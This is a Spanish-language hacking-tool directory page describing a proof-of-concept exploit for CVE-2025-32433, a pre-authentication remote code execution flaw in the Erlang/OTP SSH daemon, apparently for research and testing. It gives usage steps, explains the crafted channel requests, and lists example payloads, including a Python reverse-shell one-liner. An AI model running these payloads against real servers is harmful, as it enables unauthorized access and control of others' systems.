Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-32433 — Exploit de prueba de concepto para CVE-2025-32433, una RCE previa a la autenticación en el demonio SSH de Erlang/OTP. Incluye un script en Python para enviar solicitudes de canal SSH manipuladas y ejecutar comandos arbitrarios. | Kitploit
Herramientas/GitHubGitHub/mdusmandasthaheer/cve-2025-32433
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubmdusmandasthaheer/cve-2025-32433

CVE-2025-32433

Exploit de prueba de concepto para CVE-2025-32433, una RCE previa a la autenticación en el demonio SSH de Erlang/OTP. Incluye un script en Python para enviar solicitudes de canal SSH manipuladas y ejecutar comandos arbitrarios.

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-32433 – Vulnerabilidad RCE en SSH de Erlang/OTP

📌 Resumen

CVE-2025-32433 es una vulnerabilidad de ejecución remota de código (RCE) que afecta al daemon SSH de Erlang/OTP. La causa raíz es el manejo inadecuado de solicitudes de canal SSH previas a la autenticación, que un atacante puede manipular para provocar la ejecución arbitraria de comandos antes de la autenticación. El PoC incluido demuestra el envío de dichos paquetes SSH manipulados; de forma predeterminada escribe /lab.txt en el objetivo, pero se puede adaptar para otros comandos.

⚠️ Aviso: Este repositorio es solo para fines educativos y de investigación. No lo utilice contra sistemas sin permiso explícito.

🛠️ Uso

  1. Edite los detalles del objetivo en el script de PoC:
root@kitploit:~
HOST = "127.0.0.1"  # Target IP
PORT = 2222         # Target SSH port
  1. Ejecute el exploit:
root@kitploit:~
python3 cve-2025-32433.py

De forma predeterminada crea con el contenido . Modifique la carga útil en para ejecutar sus propios comandos.

/lab.txt
pwned
build_channel_request

🧩 Ejemplos de cargas útiles

root@kitploit:~
# Write a file
file:write_file("/lab.txt", <<"pwned">>).

Spawn a reverse shell

os:cmd("python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("127.0.0.1",2222)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); import pty; pty.spawn("sh")'")

🔧 Cómo funciona el PoC (resumen)

  • Se conecta al servicio SSH e intercambia banners.
  • Envía un SSH_MSG_KEXINIT manipulado para que parezca un handshake normal.
  • Envía SSH_MSG_CHANNEL_OPEN y SSH_MSG_CHANNEL_REQUEST con una carga útil exec antes de la autenticación.
  • Si es vulnerable, el servidor ejecuta el comando Erlang suministrado.

🙏 Créditos

Descubrimiento y documentación por Matt Keeley (Platform Security). Agradecimientos a él por publicar el PoC y compartir detalles.

Enlace al blog: https://platformsecurity.com/blog/CVE-2025-32433-poc

📚 Referencias

  • Blog de Matt Keeley
  • Avisos de seguridad de Erlang/OTP
  • Registro CVE de MITRE
Descargar herramienta